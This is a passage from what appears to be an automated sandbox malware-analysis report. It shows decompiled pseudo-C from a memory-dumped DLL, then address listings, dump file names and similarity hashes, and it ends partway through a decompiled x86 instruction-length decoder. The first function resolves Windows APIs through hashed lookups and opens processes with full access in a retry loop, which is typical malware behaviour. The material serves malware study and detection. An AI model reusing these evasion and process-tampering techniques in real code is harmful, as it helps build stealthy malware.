				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6E7CB658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6E7CF4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6E7CF654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6E7D2234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6E7CF654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6E7CF584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6E7CF584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6E7CF4BC(_t449 + 0x14, 0);
									_t180 = E6E7D2908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6E7CB5C4(_t449 + 0x34);
										E6E7CB5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6E7CF4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6E7CF4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6E7CB5C4(_t449 + 0x34);
										E6E7CB5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6E7CCA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6E7CC280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6E7CF828(_t449 + 0x14, E6E7CF4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6E7CF4BC(_t449 + 0x14, E6E7CF4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6E7D3064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6E7CF828(_t449 + 0x40, E6E7CF4CC(_t449 + 0x3c) + 4);
											 *(E6E7CF4BC(_t449 + 0x40, E6E7CF4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6E7CCD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6E7CF4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6E7CF4BC(_t449 + 0x40, _t431 * 4);
												E6E7C8B58( *_t211, E6E7D02B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6E7CCD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6E7CF4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6E7CF4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6E7CF4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6E7CF4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6E7CF4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6E7D38F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6E7CF4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6E7CF828( *(_t449 + 4), E6E7CF4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6E7CF4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6E7CF4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6E7CF4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6E7CF4BC(_t322, _t430);
										E6E7D38F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6E7CF4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6E7CF828(_t322, E6E7CF4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6E7CF828( *(_t449 + 4), E6E7CF4CC( *_t449) + 4);
								 *(E6E7CF4BC( *(_t449 + 4), E6E7CF4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6E7CF828(_t322, E6E7CF4CC(_t322) + 4);
								 *(E6E7CF4BC(_t322, E6E7CF4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6E7CF4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6E7D3064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6E7CF4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6E7CF828( *(_t449 + 4), E6E7CF4CC( *_t449) + 4);
										 *(E6E7CF4BC( *(_t449 + 4), E6E7CF4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6E7CF4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6E7CF828( *((intOrPtr*)(_t449 + 0x74)), E6E7CF4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6E7CF4BC( *((intOrPtr*)(_t449 + 0x74)), E6E7CF4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6E7CF4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6E7CF4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6E7CF4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6E7CF4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6E7CF4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6E7CF4BC(_t430, _t443);
										E6E7D38F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6E7CF4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6E7CF828(_t430, E6E7CF4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6E7D3064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6E7CF4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6E7CF4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6E7CF4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6E7CF4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6E7CF4BC( *(_t449 + 4), _t445);
										E6E7D38F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6E7CF4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6E7CF828( *(_t449 + 4), E6E7CF4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6E7CF4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6e7c8435
0x6e7c843b
0x6e7c843f
0x6e7c8443
0x6e7c844e
0x6e7c8452
0x6e7c8457
0x6e7c845f
0x6e7c846f
0x00000000
0x6e7c8471
0x6e7c8479
0x6e7c8480
0x6e7c8480
0x6e7c89d3
0x6e7c89d5
0x6e7c8a16
0x6e7c8a18
0x6e7c8a27
0x6e7c8a33
0x6e7c8a33
0x6e7c8a22
0x6e7c8a39
0x6e7c8a3e
0x00000000
0x6e7c8a3e
0x6e7c8a26
0x00000000
0x6e7c848a
0x6e7c848e
0x6e7c8491
0x6e7c8599
0x6e7c8599
0x6e7c859e
0x6e7c86c1
0x6e7c86c5
0x6e7c86ca
0x6e7c86ce
0x6e7c86d2
0x6e7c8808
0x6e7c880a
0x6e7c880e
0x6e7c8817
0x6e7c8822
0x6e7c8826
0x6e7c882f
0x6e7c8834
0x6e7c883a
0x6e7c883b
0x6e7c883f
0x6e7c8843
0x6e7c884a
0x6e7c884c
0x6e7c898c
0x6e7c899d
0x6e7c89a4
0x6e7c89ab
0x6e7c89ab
0x6e7c89ae
0x6e7c89b1
0x6e7c89b4
0x6e7c89ba
0x6e7c89c1
0x6e7c89c5
0x6e7c89ce
0x00000000
0x6e7c89ce
0x6e7c89bc
0x6e7c89bf
0x6e7c89d8
0x6e7c89f0
0x6e7c89f3
0x6e7c89f8
0x6e7c8a02
0x6e7c8a05
0x6e7c8a08
0x6e7c8a11
0x00000000
0x6e7c8a11
0x00000000
0x6e7c89bf
0x6e7c8854
0x6e7c8854
0x6e7c8856
0x6e7c885a
0x6e7c885f
0x6e7c8861
0x6e7c8865
0x6e7c8868
0x6e7c8870
0x6e7c8872
0x00000000
0x00000000
0x6e7c8889
0x6e7c88a4
0x6e7c88a6
0x6e7c88b4
0x6e7c88b9
0x6e7c88bb
0x6e7c88d8
0x6e7c88d8
0x6e7c88dc
0x6e7c88de
0x00000000
0x00000000
0x6e7c88e0
0x6e7c88e3
0x6e7c8904
0x6e7c8923
0x6e7c8929
0x6e7c892c
0x6e7c8931
0x6e7c8932
0x6e7c8939
0x00000000
0x00000000
0x6e7c8941
0x6e7c8941
0x6e7c8943
0x6e7c894f
0x6e7c895b
0x6e7c897d
0x6e7c8982
0x6e7c8983
0x6e7c8983
0x00000000
0x6e7c8943
0x00000000
0x6e7c88e3
0x6e7c88bd
0x6e7c88c3
0x6e7c88c5
0x6e7c88c6
0x6e7c88c7
0x6e7c88c8
0x6e7c88cc
0x6e7c88d0
0x6e7c88d2
0x6e7c88d3
0x6e7c88d4
0x6e7c88d6
0x00000000
0x00000000
0x00000000
0x6e7c88d6
0x6e7c88e9
0x00000000
0x6e7c88e9
0x6e7c86d8
0x6e7c86da
0x6e7c86dc
0x00000000
0x00000000
0x6e7c86e6
0x6e7c86e6
0x6e7c86e8
0x6e7c86eb
0x6e7c86ed
0x6e7c86f5
0x6e7c86fc
0x6e7c8700
0x6e7c8703
0x00000000
0x00000000
0x6e7c87ff
0x6e7c8800
0x6e7c8802
0x00000000
0x00000000
0x00000000
0x6e7c8802
0x6e7c8709
0x6e7c870c
0x6e7c8715
0x6e7c871a
0x6e7c871c
0x6e7c8728
0x6e7c872c
0x6e7c8731
0x6e7c8735
0x6e7c8b12
0x6e7c8b26
0x6e7c8b48
0x6e7c8b4d
0x6e7c8b4d
0x6e7c874b
0x6e7c8750
0x6e7c8754
0x6e7c8754
0x6e7c8754
0x6e7c8754
0x6e7c8759
0x6e7c875e
0x6e7c8760
0x6e7c8764
0x6e7c876b
0x6e7c8770
0x6e7c8772
0x6e7c8ad3
0x6e7c8ae2
0x6e7c8afb
0x6e7c8b00
0x6e7c8b00
0x6e7c8785
0x6e7c878a
0x6e7c878e
0x6e7c878e
0x6e7c878e
0x6e7c87a0
0x6e7c87c1
0x6e7c87c9
0x6e7c87d7
0x6e7c87f5
0x6e7c87fb
0x6e7c87fb
0x00000000
0x6e7c870c
0x6e7c85a4
0x6e7c85a4
0x6e7c85a6
0x6e7c85ad
0x6e7c85bb
0x6e7c85bd
0x6e7c85c1
0x6e7c85c3
0x6e7c85c5
0x6e7c8600
0x6e7c860f
0x6e7c8611
0x6e7c8613
0x6e7c8631
0x6e7c8633
0x6e7c8635
0x6e7c8647
0x6e7c8665
0x6e7c866e
0x6e7c8671
0x6e7c867f
0x6e7c8690
0x6e7c86ae
0x6e7c86b0
0x6e7c86b4
0x6e7c86b4
0x6e7c86b4
0x6e7c8635
0x00000000
0x6e7c8613
0x6e7c85cb
0x6e7c85cb
0x6e7c85d0
0x6e7c85d7
0x6e7c85e6
0x6e7c85ed
0x6e7c85ef
0x00000000
0x00000000
0x6e7c85fb
0x6e7c85fc
0x6e7c85fe
0x00000000
0x00000000
0x00000000
0x6e7c85fe
0x6e7c85f1
0x6e7c85f4
0x00000000
0x00000000
0x6e7c86b6
0x6e7c86b6
0x6e7c86b7
0x6e7c86b7
0x00000000
0x6e7c8497
0x6e7c8497
0x6e7c8497
0x6e7c8499
0x6e7c84a0
0x6e7c84ae
0x6e7c84b0
0x6e7c84b4
0x6e7c84b6
0x6e7c84e2
0x6e7c84e6
0x6e7c84eb
0x6e7c84f0
0x6e7c84f4
0x6e7c84f8
0x6e7c84ff
0x6e7c8504
0x6e7c8506
0x6e7c8a95
0x6e7c8aa4
0x6e7c8ac3
0x6e7c8ac8
0x6e7c8ac8
0x6e7c8519
0x6e7c851e
0x6e7c8522
0x6e7c8522
0x6e7c8522
0x6e7c8533
0x6e7c8535
0x6e7c8537
0x6e7c8548
0x6e7c8548
0x6e7c854d
0x6e7c8552
0x6e7c8556
0x6e7c855b
0x6e7c8562
0x6e7c8567
0x6e7c8569
0x6e7c8a57
0x6e7c8a63
0x6e7c8a7d
0x6e7c8a82
0x6e7c8a82
0x6e7c857f
0x6e7c8584
0x6e7c8588
0x6e7c8588
0x6e7c8588
0x6e7c8588
0x6e7c858b
0x6e7c858b
0x00000000
0x6e7c858b
0x6e7c84ba
0x6e7c84ba
0x6e7c84bc
0x6e7c84c8
0x6e7c84cf
0x6e7c84d1
0x00000000
0x00000000
0x6e7c84dd
0x6e7c84de
0x6e7c84e0
0x00000000
0x00000000
0x00000000
0x6e7c84e0
0x6e7c84d3
0x6e7c84d6
0x00000000
0x00000000
0x6e7c858c
0x6e7c8590
0x6e7c8591
0x6e7c8591
0x00000000
0x6e7c8499
0x6e7c8491

Strings

, xrefs: 6E7C8A1A

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction ID: 19c62d2310efc5294522f2532040306fc93de25d57d18eb66ecaed2715d33b2b
Opcode Fuzzy Hash: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction Fuzzy Hash: 131270712086059FD718DFA4CA84AAEB7EDEF84B04F104D2DE599972B1EB30AD05CB53

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D9370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E7D9370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6E7D3698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
